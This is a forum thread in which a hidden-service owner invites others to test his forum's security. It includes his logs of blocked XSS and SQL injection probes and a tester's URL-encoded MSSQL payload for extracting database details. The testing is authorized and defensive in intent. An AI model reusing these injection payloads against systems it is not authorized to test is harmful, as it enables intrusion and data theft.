User Controls
Come mess with my hidden service
-
2016-10-17 at 4:44 AM UTCIt seems to me that you are vulnerable to some type of open redirect. See teh link below, where you would obviously change the username and password to yours. it lands me on the index. Or maybe that's what's supposed to happen. I don't know. Just thought it was weird i could manipulate the URL like that and get a valid page.
http://jlp4t5i2pvwdvkx3.onion:8080/?...sword=password
Ran some basic XSS and SQLi as well. But if you really want me to have a go at it, let me use my fuzzers and intercepting proxies. -
2016-10-17 at 5:32 AM UTCWas messing with some headers as well. Meh.
-
2016-10-17 at 5:53 AM UTC
It seems to me that you are vulnerable to some type of open redirect. See teh link below, where you would obviously change the username and password to yours. it lands me on the index. Or maybe that's what's supposed to happen. I don't know. Just thought it was weird i could manipulate the URL like that and get a valid page.
http://jlp4t5i2pvwdvkx3.onion:8080/?...sword=password
This doesn't seem to work for me. It takes me to the login.Ran some basic XSS and SQLi as well. But if you really want me to have a go at it, let me use my fuzzers and intercepting proxies.
Well I'm not sure how much it can really handle as far as load goes. It'd be interesting to find out though. Not right now though. Let me work on the small bugs.
Also, here is what one of my security logs looks like...
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=&
{topicTitle=1 - clickd link on reddit, password=REMOVED, =, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=1%20AND%20ASCII(LOWER(SUBSTRING((SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype=%27U%27),%201,%201)))%20%3E%20116&=INBOX&=CHAT&=SETTINGS&=ABOUT
{topicTitle=1 - clickd link on reddit, password=REMOVED, =ABOUT, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=&
{topicTitle=1 - clickd link on reddit, password=REMOVED, =, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=1%27%20AND%201=(SELECT%20COUNT(*)%20FROM%20tablenames);%20--&=INBOX&=CHAT&=SETTINGS&=ABOUT
{topicTitle=1 - clickd link on reddit, password=REMOVED, =ABOUT, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
I set it up so that any parameters that aren't part of the application will trigger an error response(or not;) and so that I understand(hopefully) what's going on. Error reports are the same. -
2016-10-17 at 8:09 AM UTC
This doesn't seem to work for me. It takes me to the login.
Well I'm not sure how much it can really handle as far as load goes. It'd be interesting to find out though. Not right now though. Let me work on the small bugs.
Also, here is what one of my security logs looks like…
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=&
{topicTitle=1 - clickd link on reddit, password=REMOVED, =, topic=true, username=Sophia, section=introductions}
………………../..\………………
………………..\../………………
…………………\/……………….
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=1%20AND%20ASCII(LOWER(SUBSTRING((SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype=%27U%27),%201,%201)))%20%3E%20116&=INBOX&=CHAT&=SETTINGS&=ABOUT
{topicTitle=1 - clickd link on reddit, password=REMOVED, =ABOUT, topic=true, username=Sophia, section=introductions}
………………../..\………………
………………..\../………………
…………………\/……………….
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=&
{topicTitle=1 - clickd link on reddit, password=REMOVED, =, topic=true, username=Sophia, section=introductions}
………………../..\………………
………………..\../………………
…………………\/……………….
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true§ion=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=1%27%20AND%201=(SELECT%20COUNT(*)%20FROM%20tablenames);%20–&=INBOX&=CHAT&=SETTINGS&=ABOUT
{topicTitle=1 - clickd link on reddit, password=REMOVED, =ABOUT, topic=true, username=Sophia, section=introductions}
………………../..\………………
………………..\../………………
…………………\/……………….
I set it up so that any parameters that aren't part of the application will trigger an error response(or not;) and so that I understand(hopefully) what's going on. Error reports are the same.
http://jlp4t5i2pvwdvkx3.onion:8080/?username=&password=submit=
Alright so if you have the URL like this and the uname and pass are set you should try to set the value of the submit parameter to a link to another section. When i did that, i landed on the index, idk about this kind of behavior but in general with web apps if you can add a url to value of some parameter and you land on the url you added you may have an open redirect or remote file inclusion vulnerability. So it might be worth checking out.
Also i am checking the submit parameter for SQLi vulns. What kind of backend are you running? I ran some heuristics that sais MySQL but i don't think that is correct. Also.
If i take this string
CONCAT_WS(CHAR(32,58,32),user(),database(),version())
And convert it to MSSQL CHAR() and url encode the payload and execute.
%20CHAR%2867%29%20%2b%20CHAR%2879%29%20%2b%20CHAR%2878%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2884%29%20%2b%20CHAR%2895%29%20%2b%20CHAR%2887%29%20%2b%20CHAR%2883%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2872%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2882%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2853%29%20%2b%20CHAR%2856%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28117%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28100%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28116%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%2898%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28118%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28105%29%20%2b%20CHAR%28111%29%20%2b%20CHAR%28110%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2841%29
The chatbox returns `1` for some reason.
It's also good to log all error messages like that, also i will continue testing for a while if it pleases you. -
2016-10-18 at 6:30 AM UTC
http://jlp4t5i2pvwdvkx3.onion:8080/?username=&password=submit=
Technically, you're just logging in when you do this. Anytime you send a parameter with a key of 'password' AND a parameter with a key of 'username', you'll be logged in and returned to the index page. Eventually I may make session tokens or cookies(depending on the security for clients).Also i am checking the submit parameter for SQLi vulns. What kind of backend are you running? I ran some heuristics that sais MySQL but i don't think that is correct. Also.
This I wont say yet(if I do).If i take this string
CONCAT_WS(CHAR(32,58,32),user(),database(),version())
And convert it to MSSQL CHAR() and url encode the payload and execute.
%20CHAR%2867%29%20%2b%20CHAR%2879%29%20%2b%20CHAR%2878%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2884%29%20%2b%20CHAR%2895%29%20%2b%20CHAR%2887%29%20%2b%20CHAR%2883%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2872%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2882%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2853%29%20%2b%20CHAR%2856%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28117%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28100%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28116%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%2898%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28118%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28105%29%20%2b%20CHAR%28111%29%20%2b%20CHAR%28110%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2841%29
The chatbox returns `1` for some reason.
This I am not about and I couldn't replicate it. Could you do again sometime when we are both only at the same time?It's also good to log all error messages like that, also i will continue testing for a while if it pleases you.
Yes please do. You can also PM me on that site your progress. I'd like to give you more inside information over time to help you possibly find vulnerabilities. Thank you. -
2016-10-20 at 10:11 PM UTCI will hit you up on there in a bit. I wish i could use zaproxy to intercept the traffic though, that would make fuzzing easier. In general zaproxy sits between me and the website i am connecting to as a http proxie, it doesn't offer socks support however. And chaining it through tor does literally nothing at all, which is gay af, because zaproxy is awesome for the most part.
-
2016-10-22 at 4:30 AM UTC
I will hit you up on there in a bit. I wish i could use zaproxy to intercept the traffic though, that would make fuzzing easier. In general zaproxy sits between me and the website i am connecting to as a http proxie, it doesn't offer socks support however. And chaining it through tor does literally nothing at all, which is gay af, because zaproxy is awesome for the most part.
I just moved to using OWASP ZAP from Burp Suite. I haven't been able to get it to work with TOR though. I got proxychains and it seemed to already come configured, but then TOR wouldn't work for some reason.
Also, I added a captcha and issue a uuid as a token rather than passing around the users password. I'd like these tested. Do you know anyone else that would like to test my site. I'm actually considering putting up some servers with security hole(s) in them to allow people to hack, just to see if they can find the error. -
2016-10-22 at 4:38 AM UTC
I just moved to using OWASP ZAP from Burp Suite. I haven't been able to get it to work with TOR though. I got proxychains and it seemed to already come configured, but then TOR wouldn't work for some reason.
Also, I added a captcha and issue a uuid as a token rather than passing around the users password. I'd like these tested. Do you know anyone else that would like to test my site. I'm actually considering putting up some servers with security hole(s) in them to allow people to hack, just to see if they can find the error.
Start proxychains with sudo, that should do the trick, and yeah sure, would you like me to post your link to a couple of forums i frequent? -
2016-10-22 at 7:14 AM UTC
Start proxychains with sudo, that should do the trick, and yeah sure, would you like me to post your link to a couple of forums i frequent?
Yes, please, but please convince them to actually alert me of any errors rather than vandalize. And no DOS or spamming. I'll make a special section of the forum for all of you that want to test for errors. PM me on the site and I'll either tell you how to access it or I'll make a special link for your accounts to access the area.
-
2016-10-31 at 12:39 AM UTC
Start proxychains with sudo, that should do the trick, and yeah sure, would you like me to post your link to a couple of forums i frequent?
This doesn't seem to work. I set my TOR browser up to use port 8181 as a proxy. I set ZAP to 8181. Both are on 127.0.0.1
Then I set ZAP to use an out going proxy on port 9050 and set the last line in the Proxychains config file to use port 9050.
My TOR browser stops working completely and won't work again at all. It says "this browser wirk work with TOR' but it is literally the TOR browser bundle. I have to unzip the original TOR browser download and redo it all.
I've followed sereral tutoruals but shit doesn't work.